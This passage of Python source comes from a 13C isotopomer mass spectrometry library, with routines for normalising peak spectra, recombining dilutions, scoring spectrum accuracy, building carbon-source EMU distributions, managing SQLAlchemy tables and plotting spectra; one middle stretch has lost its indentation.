                        corrected[k] = v - baseline;
                    else:
                        corrected[k] = 0.0;
                    intensityList.append(corrected[k]);
                else:
                    corrected[k] = 0.0;
                    intensityList.append(corrected[k]);
            peakSpectrum_corrected[frag] = corrected;
            # normalize each spectrum:
            normalized_qcqa = {};
            intensityListSum_qcqa = sum(intensityList);
            for k,v in peakSpectrum_corrected_qcqa[frag].items():
                if intensityListSum_qcqa != 0: normalized_qcqa[k] = [v[0],v[1]/intensityListSum_qcqa];
                else: normalized_qcqa[k] = [v[0], None];
            peakSpectrum_normalized_qcqa[frag] = normalized_qcqa;
            normalized = {};
            intensityListSum = sum(intensityList);
            for k,v in peakSpectrum_corrected[frag].items():
                if intensityListSum != 0: normalized[k] = v/intensityListSum;
                else: normalized[k] = None;
            peakSpectrum_normalized[frag] = normalized;
        return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
def extract_peakList_normMax(self, peakSpectrum_I, fragments_I, round_mass=False):
'''extract peak spectrum from peak list'''
# Input:
# peakSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
# fragments_I = [fragments]
# Output:
# peakSpectrum_corrected = {fragment:{mass:intensity}}
# peakSpectrum_normalized = {fragment:{mass:intensity}}
# round all precursor/product masses in input for comparison:
peakSpectrum_copy_I = {};
for frag,spec in peakSpectrum_I.items():
peakSpectrum_tmp = {};
for masses,intensity in spec.items():
peakSpectrum_tmp[numpy.around(masses)] = intensity;
peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
if round_mass:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
else:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I);
# determine masses from fragments
masses = [];
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
# 1. copy data from peakSpectrum_I to peakSpectrum_corrected based on theoretical fragments
intensityList = [];
if frag in peakSpectrum_I:
fragment_masses = [k for k in peakSpectrum_copy_I[frag].keys()];
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
if mass in fragment_masses:
corrected = peakSpectrum_copy_I[frag][mass];
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
else:
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
# normalize each spectrum:
#NOTE: normalization by max to allow for later conversion to normalization by sum
normalized = {};
intensityListMax = max(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if v:
if intensityListMax != 0: normalized[k] = v/intensityListMax;
else: normalized[k] = None;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_corrected, peakSpectrum_normalized;
def extract_peakList_normSum(self, peakSpectrum_I, fragments_I, round_mass=False):
'''extract peak spectrum from peak list'''
# Input:
# peakSpectrum_I = {fragment:{mass:intensity}}
# fragments_I = [fragments]
# Output:
# peakSpectrum_corrected = {fragment:{mass:intensity}}
# peakSpectrum_normalized = {fragment:{mass:intensity}}
# round all precursor/product masses in input for comparison:
peakSpectrum_copy_I = {};
for frag,spec in peakSpectrum_I.items():
peakSpectrum_tmp = {};
for masses,intensity in spec.items():
peakSpectrum_tmp[numpy.around(masses)] = intensity;
peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
if round_mass:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I,True);
else:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I);
# determine masses from fragments
masses = [];
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
# 1. copy data from peakSpectrum_I to peakSpectrum_corrected based on theoretical fragments
intensityList = [];
if frag in peakSpectrum_I:
fragment_masses = [k for k in peakSpectrum_copy_I[frag].keys()];
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
if mass in fragment_masses and peakSpectrum_copy_I[frag][mass]:
corrected = peakSpectrum_copy_I[frag][mass];
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
else:
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
# normalize each spectrum:
normalized = {};
intensityListSum = sum(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if v>0.0:
if intensityListSum != 0: normalized[k] = v/intensityListSum;
else: normalized[k] = None;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_corrected, peakSpectrum_normalized;
def recombine_dilutionsMRMs(self,peakData_I):
'''Method to "recombine" MRMs from one dilution to the next'''
# input: peakData_I = {frag:[mass:{'intensity':intensity,
# 'dilution':dilution,
# 'used_':used_,
# 'comment_':comment_}]}
# e.g.: {frag:[100:{'dilution':'high',...}],
# [101:{'dilution':'low','comment_':'Recombine',...}],
# [101:{'dilution':'high','comment_':'Recombine',...}],
# [102:{'dilution':'low','comment_':'Recombine',...}],
# [103:{'dilution':'low',...}],...}
# NOTE: dictionary > List of dictionaries
# NOTE: input list of masses must be sorted in ascending order
# followed by 'dilutions' in descending order as shown below!
# output: peakData_O = {frag:{mass:{'intensity':intensity,
# 'dilution':dilution,
# 'used_':used_,
# 'comment_':comment_}}}
# peakData_O_false = {frag:{mass:{'intensity':intensity,
# 'dilution':dilution,
# 'used_':used_,
# 'comment_':comment_}}}
# Note: second output structure needed to update rows that are changed to false
'''Algorithm:
start:
dilution m comment used
'low' 0 '' false
'high' 0 '' true
'low' 1 'Recombine' true
'high' 1 'Recombine' true
'low' 2 'Recombine' true
'high' 2 '' false
'low' 3 '' true
'high' 3 '' false
recombine...
end:
dilution m comment used
'low' 0 '' false
'high' 0 '' true
'low' 1 'Recombine' false
'high' 1 'Recombine' true
'low' 2 'Recombine' true
'high' 2 '' false
'low' 3 '' true
'high' 3 '' false
...
done prior: set normalized intensity to diluion 'low', m 1 to 1;
recalculate the rest of the normalized intensities for the dilutions 'low', m 2,3,4,...;
calculate the percent change from dilution 'low', m 1 to dilution 'low', m 2; from dilution 'low', m 2 to dilution 'low', m 3; ...;
replace dilution 'high', m 2 with the normalized intensity for dilution 'low', m 1 - the percent change from dilution 'low', m 1 to dilution 'low', m 2;
replace dilution 'low', m 3 with the new normalized intensity for m 2 - the percent change from dilution 'low', m 2 to dilution 'low', m 3;
...;'''
peakData_O = {};
peakData_O_false = {};
#iterate through each fragment
for frag,spec in peakData_I.items():
peakData_O[frag] = None;
peakData_O_false[frag] = None;
spec_O = {};
spec_O_false = {};
if not spec: continue; #check if there is data for the fragment
# extract out dilutions
dilutions = [];
for d in spec:
values = list(d.values())[0];
dilutions.append(values['dilution']);
dilutions = list(set(dilutions));
dilutions.sort();
dilutions_dict = dict(list(zip(dilutions,['low','high'])));
#iterate through each spectrum
intensity_prev = 0.0
intensity_new = 0.0;
intensity_difference = 0.0;
recombine_cnt = 0;
for spec_dict in spec:
mass = list(spec_dict.keys())[0];
data = list(spec_dict.values())[0];
spec_O[mass] = None;
data_O = {};
if not data['intensity']:
data_O['dilution'] = None;
data_O['intensity'] = None;
data_O['comment_'] = None;
data_O['used_'] = None;
spec_O[mass] = data_O;
continue;
if data['comment_'] == 'Recombine':
if recombine_cnt == 0: # 1st recombination event
if dilutions_dict[data['dilution']] != 'low': print('bad input');
intensity_prev = data['intensity'];
data['used_'] = False;
# copy the data
data_O['dilution'] = data['dilution'];
data_O['intensity'] = data['intensity'];
data_O['comment_'] = data['comment_'];
data_O['used_'] = data['used_'];
spec_O_false[mass] = data_O;
recombine_cnt += 1;
continue
elif recombine_cnt == 1: # 2nd recombination event
if dilutions_dict[data['dilution']] != 'high': print('bad input');
intensity_new = data['intensity'];
recombine_cnt += 1;
elif recombine_cnt == 2: # 3rd recombination event
if dilutions_dict[data['dilution']] != 'low': print('bad input');
intensity_difference = data['intensity']/intensity_prev;
intensity_prev = data['intensity'];
intensity_new = intensity_new*intensity_difference;
data['intensity'] = intensity_new;
recombine_cnt += 1;
elif recombine_cnt >= 3:
if dilutions_dict[data['dilution']] != 'low': print('bad input');
intensity_difference = data['intensity']/intensity_prev;
intensity_prev = data['intensity'];
intensity_new = intensity_new*intensity_difference;
data['intensity'] = intensity_new;
recombine_cnt += 1;
# copy data
data_O['dilution'] = data['dilution'];
data_O['intensity'] = data['intensity'];
data_O['comment_'] = data['comment_'];
data_O['used_'] = data['used_'];
spec_O[mass] = data_O;
# copy spectrum
peakData_O[frag] = spec_O
peakData_O_false[frag] = spec_O_false
#copy out the intensities without the comments
peakData_intensities_O = {};
for frag,spec in peakData_O.items():
spec_tmp = {};
for mass,v in spec.items():
spec_tmp[mass]=v['intensity'];
peakData_intensities_O[frag] = spec_tmp;
return peakData_O,peakData_O_false,peakData_intensities_O;
def normalize_peakSpectrum_normMax(self,peakSpectrum_I,scalingFactors_I):
    '''normalize peakSpectrum taken from different m+0, m+1, ... fragments
    using a reference scaling factor

    Input:
    peakSpectrum_I = {precursor_fragment:{product_fragment:{product_mass:intensity}}}
    scalingFactors_I = {precursor_fragment:intensity}
    Output:
    peakSpectrum_normalized = {product_fragment:{mass:intensity}}

    Algorithm:
    part 1: scale
        for each precursor i, product j, mass m:
            peakSpectrum[precursor_i][product_j][m]*scalingFactor[precursor_i]
    part 2: reduce
        for each product j, mass m:
            peakSpectrum_O[product_j][m] += scaled intensity over all precursors i
    part 3: re-normalize each product spectrum to its maximum intensity'''
    precursor_fragments_I = list(peakSpectrum_I.keys());
    precursorSpectrum_dict = {};
    product_fragments_all = [];
    # union of masses observed per product fragment, across all precursors
    product_mass_combined = {};
    # part 1: scale each precursor's spectra by its scaling factor
    for precursor in precursor_fragments_I:
        productSpectrum_dict = {};
        for product,spectrum in peakSpectrum_I[precursor].items():
            product_fragments_all.append(product);
            spectrum_dict = {};
            for mass,intensity in spectrum.items():
                # falsy intensities (None/0) are recorded as 0.0 (unscaled)
                spectrum_dict[mass] = intensity*scalingFactors_I[precursor] if intensity else 0.0;
                product_mass_combined.setdefault(product,[]).append(mass);
            productSpectrum_dict[product] = spectrum_dict;
        precursorSpectrum_dict[precursor] = productSpectrum_dict;
    # reduce product fragments and masses to unique sets
    # (previously the combining loop re-walked the duplicate-bearing list)
    product_fragments_reduced = list(set(product_fragments_all));
    product_mass_reduced = {p:list(set(m)) for p,m in product_mass_combined.items()};
    # part 2: sum the scaled intensities across precursors
    peakSpectrum_normalized_O = {};
    for product in product_fragments_reduced:
        peakSpectrum_normalized_tmp = {};
        for mass in product_mass_reduced[product]:
            total = 0.0;
            for precursor in precursor_fragments_I:
                if product in precursorSpectrum_dict[precursor] and \
                    mass in precursorSpectrum_dict[precursor][product]:
                    total += precursorSpectrum_dict[precursor][product][mass];
            peakSpectrum_normalized_tmp[mass] = total;
        peakSpectrum_normalized_O[product] = peakSpectrum_normalized_tmp;
    # part 3: re-normalize each product spectrum to its maximum intensity
    peakSpectrum_normalized_O_max = {};
    for product,spec in peakSpectrum_normalized_O.items():
        # guard empty spectra (previously max([]) raised ValueError)
        intensity_max = max(spec.values()) if spec else 0.0;
        fragmentSpectrum = {};
        for mass,intensity in spec.items():
            fragmentSpectrum[mass] = intensity/intensity_max if intensity_max != 0.0 else 0.0;
        peakSpectrum_normalized_O_max[product] = fragmentSpectrum;
    return peakSpectrum_normalized_O_max
def calculate_fragmentSpectrumAccuracy(self, peakSpectrum_normalized_list_I):
    '''calculate the accuracy from the normalized intensity

    Accuracy = mean absolute deviation of the measured (replicate-averaged)
    intensities from the theoretical max-normalized spectrum.

    Input:
    peakSpectrum_normalized_list_I = [{fragment:{mass:intensity}}]
    Output:
    peakSpectrum_accuracy_O = {fragment:float};'''
    fragments_I = list(peakSpectrum_normalized_list_I[0].keys());
    peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
    peakSpectrum_accuracy_O = dict.fromkeys(fragments_I);
    for frag in fragments_I:
        if not peakSpectrum_theoretical[frag]:
            continue; # no carbons in fragment
        theoretical_masses = list(peakSpectrum_theoretical[frag].keys());
        # gather the measured intensity for every theoretical mass;
        # missing or non-positive measurements are treated as 0.0
        measured = [
            {m:(ps[frag][m] if frag in ps and m in ps[frag] and ps[frag][m] > 0.0 else 0.0)
             for m in theoretical_masses}
            for ps in peakSpectrum_normalized_list_I];
        deviations = [];
        for m in theoretical_masses:
            values = [d[m] for d in measured if d[m] >= 0.0];
            # only score masses with data and a non-zero theoretical intensity
            if values and peakSpectrum_theoretical[frag][m]:
                deviations.append(abs(numpy.array(values).mean() - peakSpectrum_theoretical[frag][m]));
        peakSpectrum_accuracy_O[frag] = numpy.mean(deviations) if deviations else None;
    return peakSpectrum_accuracy_O;
def calculate_fragmentSpectrumAccuracy_normSum(self, peakSpectrum_normalized_list_I):
    '''calculate the accuracy from the normalized intensity

    Same as calculate_fragmentSpectrumAccuracy, but scored against the
    sum-normalized theoretical spectrum.

    Input:
    peakSpectrum_normalized_list_I = [{fragment:{mass:intensity}}]
    Output:
    peakSpectrum_accuracy_O = {fragment:float};'''
    fragments_I = list(peakSpectrum_normalized_list_I[0].keys());
    peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I,True);
    peakSpectrum_accuracy_O = {};
    for frag in fragments_I:
        peakSpectrum_accuracy_O[frag] = None;
        theoretical = peakSpectrum_theoretical[frag];
        if not theoretical:
            continue; # no carbons in fragment
        theoretical_masses = list(theoretical.keys());
        # collect measured intensities per replicate; missing or
        # non-positive measurements are recorded as 0.0
        measured = [];
        for ps in peakSpectrum_normalized_list_I:
            replicate = {};
            for m in theoretical_masses:
                has_value = frag in ps and m in ps[frag] and ps[frag][m] > 0.0;
                replicate[m] = ps[frag][m] if has_value else 0.0;
            measured.append(replicate);
        deviations = [];
        for m in theoretical_masses:
            values = [r[m] for r in measured if r[m] >= 0.0];
            # only score masses with data and a non-zero theoretical intensity
            if values and theoretical[m]:
                deviations.append(abs(numpy.array(values).mean() - theoretical[m]));
        if deviations:
            peakSpectrum_accuracy_O[frag] = numpy.mean(deviations);
    return peakSpectrum_accuracy_O;
def make_CSourceMix(self,csources_I, composition_I):
    '''Make a carbon source mix of a specified composition

    Input: (e.g. 80/20 1-13C/U-13C glc)
    csources_I = carbon backbones of the csources, one list of per-carbon
        formula strings per source
    composition_I = fractional composition of the csources, e.g. [0.8,0.2]
    Output:
    emu_O = {strings of emu distribution: spectral list}'''
    # EMU distribution + spectra for each individual carbon source
    distributions = [self.make_EMUDistributionAndCSpectra(cs) for cs in csources_I];
    emu_O = {};
    # composition-weighted sum of the spectra, keyed by the EMUs of the
    # first carbon source (all sources are assumed to share the same EMUs)
    for emu in distributions[0]:
        mixed = [0.0]*len(distributions[0][emu]);
        for fraction,dist in zip(composition_I,distributions):
            for idx,intensity in enumerate(dist[emu]):
                mixed[idx] += fraction*intensity;
        emu_O[emu] = mixed;
    return emu_O;
def make_EMUDistributionAndCSpectra(self,csource_I):
    '''Make EMU distribution based on the carbon source'''
    # Input:
    # csource_I = carbon backbone of the csource, one formula string per carbon
    # e.g. 1-13C glc = ['[13C]HO','CH2','CH2','CH2','CH2','CH3O']
    # U-13C glc = ['[13C]HO','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H3O']
    # glc = ['CHO','CH2O','CH2O','CH2O','CH2O','CH3O']
    # Output:
    # emu_O = {strings of emu distribution: spectral list}
    # The EMU key is 'x' + a 0/1 mask over the backbone carbons; its value is
    # the sum-normalized spectrum (sorted by mass) of the fragment built from
    # the carbons flagged '1'.
    nC = len(csource_I)
    emu_O = {};
    # Pass 1: enumerate EMU masks starting from the all-'0' (unlabeled) mask,
    # progressively toggling carbons via the nested j/c/i index shifts below.
    # iterate through each carbon and change from 0 to 1
    emu_c = nC*'0'; #intialize
    emu_lst = list(emu_c);
    for j in range(nC):
        emu_lst[j] = '1'
        for c in range(j,nC):
            emu_lst_2 = copy.copy(emu_lst)
            emu_lst_2[j] = '0';
            emu_lst_2[c] = '1';
            emu_tmp = copy.copy(emu_lst_2);
            cfrag = []; # NOTE(review): unused accumulator, kept as-is
            for i in range(c,nC):
                # shift the '1' from position c to position i
                emu_tmp[c] = '0';
                emu_tmp[i] = '1';
                emu_str = 'x' + ''.join(emu_tmp)
                # carbons included in this EMU -> combined fragment formula
                dfrag = [csource_I[p] for p,n in enumerate(emu_tmp) if n=='1']
                dfrag_tmp = ''.join(dfrag)
                #if emu_str.find('0')==-1: #ignore the fully labeled fragment
                #    continue;
                spectrum_tmp = self.report_fragmentSpectrum_normSum([dfrag_tmp],round_mass=True)
                # format from dict into a list (ordered by ascending mass):
                spectrum_tmp_lst = [];
                spectrum_masses_lst = [];
                for k,v in spectrum_tmp[dfrag_tmp].items():
                    spectrum_masses_lst.append(k);
                spectrum_masses_lst.sort();
                for k in spectrum_masses_lst:
                    spectrum_tmp_lst.append(spectrum_tmp[dfrag_tmp][k]);
                emu_O[emu_str] = spectrum_tmp_lst;
    # Pass 2: mirror of pass 1, starting from the all-'1' (fully labeled)
    # mask and toggling carbons to '0' (last carbon excluded via nC-1).
    emu_c = nC*'1'; #intialize
    emu_lst = list(emu_c);
    for j in range(nC-1):
        emu_lst[j] = '0'
        for c in range(j,nC-1):
            emu_lst_2 = copy.copy(emu_lst)
            emu_lst_2[j] = '1';
            emu_lst_2[c] = '0';
            emu_tmp = copy.copy(emu_lst_2);
            cfrag = []; # NOTE(review): unused accumulator, kept as-is
            for i in range(c,nC-1):
                # shift the '0' from position c to position i
                emu_tmp[c] = '1';
                emu_tmp[i] = '0';
                emu_str = 'x' + ''.join(emu_tmp)
                dfrag = [csource_I[p] for p,n in enumerate(emu_tmp) if n=='1']
                dfrag_tmp = ''.join(dfrag)
                #if emu_str.find('0')==-1: #ignore the fully labeled fragment
                #    continue;
                spectrum_tmp = self.report_fragmentSpectrum_normSum([dfrag_tmp],round_mass=True)
                # format from dict into a list (ordered by ascending mass):
                spectrum_tmp_lst = [];
                spectrum_masses_lst = [];
                for k,v in spectrum_tmp[dfrag_tmp].items():
                    spectrum_masses_lst.append(k);
                spectrum_masses_lst.sort();
                for k in spectrum_masses_lst:
                    spectrum_tmp_lst.append(spectrum_tmp[dfrag_tmp][k]);
                emu_O[emu_str] = spectrum_tmp_lst;
    return emu_O;
#table updates:
def update_dataStage01NormalizedFromAverages(self,experiment_id_I):
    '''update data_stage01_normalized from data_stage01_averages'''
    # fetch row information for every sample of the experiment
    rows = self.stage01_isotopomer_query.get_row_experimentID_dataStage01Averages(experiment_id_I);
    # update entries that match the corresponding experiment_id/sample_name_abbreviation/
    # sample_type/time_point/met_id/fragment_formula/fragment_mass with used_ and comment_
    self.stage01_isotopomer_query.update_usedAndComment_stage01_isotopomer_normalized(rows);
#table initializations:
def drop_dataStage01(self):
    '''Drop the data_stage01 isotopomer tables (checkfirst semantics).'''
    # NOTE: data_stage01_isotopomer_MQResultsTable is deliberately not dropped
    tables = [
        data_stage01_isotopomer_peakData,
        data_stage01_isotopomer_peakList,
        data_stage01_isotopomer_peakSpectrum,
        data_stage01_isotopomer_normalized,
        data_stage01_isotopomer_averages,
        data_stage01_isotopomer_averagesNormSum,
        data_stage01_isotopomer_spectrumAccuracy,
        ];
    try:
        for table in tables:
            table.__table__.drop(engine,True);
    except SQLAlchemyError as e:
        print(e);
def reset_dataStage01(self,experiment_id_I = None):
    '''Delete all data_stage01 isotopomer rows; when experiment_id_I is
    given, only rows whose experiment_id matches it (SQL LIKE).'''
    tables = [
        data_stage01_isotopomer_peakSpectrum,
        data_stage01_isotopomer_peakList,
        data_stage01_isotopomer_peakData,
        data_stage01_isotopomer_normalized,
        data_stage01_isotopomer_averages,
        data_stage01_isotopomer_averagesNormSum,
        data_stage01_isotopomer_spectrumAccuracy,
        ];
    try:
        for table in tables:
            query = self.session.query(table);
            if experiment_id_I:
                # restrict the delete to the requested experiment
                query = query.filter(table.experiment_id.like(experiment_id_I));
            query.delete(synchronize_session=False);
        self.session.commit();
    except SQLAlchemyError as e:
        print(e);
def reset_datastage01_isotopomer_averages(self,experiment_id_I):
    '''Delete averages and averagesNormSum rows for the given experiment
    (experiment_id matched with SQL LIKE); no-op when no id is given.'''
    try:
        if experiment_id_I:
            for table in [data_stage01_isotopomer_averages,
                          data_stage01_isotopomer_averagesNormSum]:
                self.session.query(table).filter(
                    table.experiment_id.like(experiment_id_I)).delete(
                    synchronize_session=False);
            self.session.commit();
    except SQLAlchemyError as e:
        print(e);
def reset_datastage01_isotopomer_peakData(self,experiment_id_I):
    '''Delete peakData rows for the given experiment (experiment_id matched
    with SQL LIKE); no-op when no id is given.'''
    try:
        if experiment_id_I:
            self.session.query(data_stage01_isotopomer_peakData).filter(
                data_stage01_isotopomer_peakData.experiment_id.like(experiment_id_I)).delete(
                synchronize_session=False);
            self.session.commit();
    except SQLAlchemyError as e:
        print(e);
def initialize_dataStage01(self):
    '''Create the data_stage01 isotopomer tables (checkfirst semantics).'''
    tables = [
        data_stage01_isotopomer_MQResultsTable,
        data_stage01_isotopomer_peakSpectrum,
        data_stage01_isotopomer_peakList,
        data_stage01_isotopomer_peakData,
        data_stage01_isotopomer_normalized,
        data_stage01_isotopomer_averages,
        data_stage01_isotopomer_averagesNormSum,
        data_stage01_isotopomer_spectrumAccuracy,
        ];
    try:
        for table in tables:
            table.__table__.create(engine,True);
    except SQLAlchemyError as e:
        print(e);
#plotting methods:
def plot_normalizedSpectrum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
    '''plot the normalized spectrum'''
    '''Assumptions:
    only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
    (i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
    '''
    # Plots a multi-panel bar chart (one panel per replicate) of the
    # max-normalized spectrum for every time-point/sample/scan-type/metabolite/fragment.
    # The optional *_I arguments act as filters; when omitted, everything
    # found in data_stage01_isotopomer_normalized for the experiment is plotted.
    print('plot_normalizedSpectrum...')
    plot = matplot();
    # get time points
    time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
    for tp in time_points:
        print('Plotting precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
        # resolve sample name abbreviations (and a parallel list of their
        # sample types) from the caller-supplied filters, in precedence order
        if sample_names_I:
            sample_abbreviations = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for sn in sample_names_I:
                for st in sample_types:
                    sample_abbreviations_tmp = [];
                    sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
                    sample_abbreviations.extend(sample_abbreviations_tmp);
                    sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
        elif sample_name_abbreviations_I:
            sample_abbreviations = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for sn in sample_name_abbreviations_I:
                for st in sample_types:
                    sample_abbreviations_tmp = [];
                    sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleNameAbbreviation_dataStage01Normalized(experiment_id_I,st,tp,sn);
                    sample_abbreviations.extend(sample_abbreviations_tmp);
                    sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
        # query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
        else:
            # get sample names and sample name abbreviations
            sample_abbreviations = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for st in sample_types:
                sample_abbreviations_tmp = [];
                sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
                sample_abbreviations.extend(sample_abbreviations_tmp);
                sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
        for sna_cnt,sna in enumerate(sample_abbreviations):
            print('Plotting precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
            # get the scan_types (optionally intersected with scan_types_I)
            if scan_types_I:
                scan_types = [];
                scan_types_tmp = [];
                scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
                scan_types = [st for st in scan_types_tmp if st in scan_types_I];
            else:
                scan_types = [];
                scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
            for scan_type in scan_types:
                print('Plotting precursor and product spectrum for scan type ' + scan_type)
                # met_ids
                if not met_ids_I:
                    met_ids = [];
                    met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
                        experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
                else:
                    met_ids = met_ids_I;
                if not(met_ids): continue #no component information was found
                for met in met_ids:
                    print('Plotting precursor and product spectrum for metabolite ' + met);
                    replicate_numbers = [];
                    replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
                        experiment_id_I,sna,tp,scan_type,met);
                    peakSpectrum_normalized_lst = [];
                    fragment_formulas_lst = [];
                    if not(replicate_numbers): continue; #no replicates found
                    for rep in replicate_numbers:
                        print('Plotting precursor and product spectrum for replicate_number ' + str(rep));
                        #get data
                        peakData_I = {};
                        peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
                            experiment_id_I,sna,tp,scan_type,met,rep);
                        if peakData_I:
                            fragment_formulas = list(peakData_I.keys());
                            fragment_formulas_lst.extend(fragment_formulas)
                            # max-normalize the peak list for this replicate
                            peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
                                peakData_I, fragment_formulas, True);
                            peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
                    # plot spectrum data for all replicates and fragments
                    fragment_formulas_unique = list(set(fragment_formulas_lst));
                    for fragment in fragment_formulas_unique:
                        panelLabels = [];
                        xticklabels = [];
                        mean = [];
                        xlabel = 'm/z'
                        ylabel = 'intensity'
                        for rep,spectrum in enumerate(peakSpectrum_normalized_lst):
                            panelLabels_tmp = sna+'_'+met+'_'+fragment+'_'+str(rep+1)
                            xticklabels_tmp = [];
                            mean_tmp = [];
                            # a replicate may not contain every fragment
                            if fragment not in spectrum:
                                print('no spectrum found for fragment ' + fragment);
                                continue;
                            for mass,intensity in spectrum[fragment].items():
                                intensity_tmp = intensity;
                                # plot missing intensities as 0.0
                                if not intensity_tmp: intensity_tmp=0.0
                                mean_tmp.append(intensity_tmp);
                                xticklabels_tmp.append(mass);
                            panelLabels.append(panelLabels_tmp);
                            xticklabels.append(xticklabels_tmp);
                            mean.append(mean_tmp);
                        plot.multiPanelBarPlot('',xticklabels,xlabel,ylabel,panelLabels,mean);
def plot_normalizedSpectrumNormSum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
    '''plot the sum-normalized spectrum for all samples and scan types'''
    '''Assumptions:
    only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
    (i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
    '''
    # Plots a multi-panel bar chart (one panel per replicate) of the
    # sum-normalized spectrum for every time-point/sample/scan-type/metabolite/fragment.
    print('plot_normalizedSpectrumNormSum...')
    plot = matplot();
    # get time points
    time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
    for tp in time_points:
        print('Plotting precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
        # resolve sample name abbreviations (and a parallel list of their
        # sample types) from the caller-supplied filters, in precedence order
        if sample_names_I:
            sample_abbreviations = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for sn in sample_names_I:
                for st in sample_types:
                    sample_abbreviations_tmp = [];
                    sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
                    sample_abbreviations.extend(sample_abbreviations_tmp);
                    # BUGFIX: previously sized by undefined 'sample_names_tmp' (NameError)
                    sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
        elif sample_name_abbreviations_I:
            sample_abbreviations = sample_name_abbreviations_I;
            sample_types_lst = ['Unknown' for x in sample_abbreviations];
        # query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
        else:
            # get sample names and sample name abbreviations
            sample_abbreviations = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for st in sample_types:
                sample_abbreviations_tmp = [];
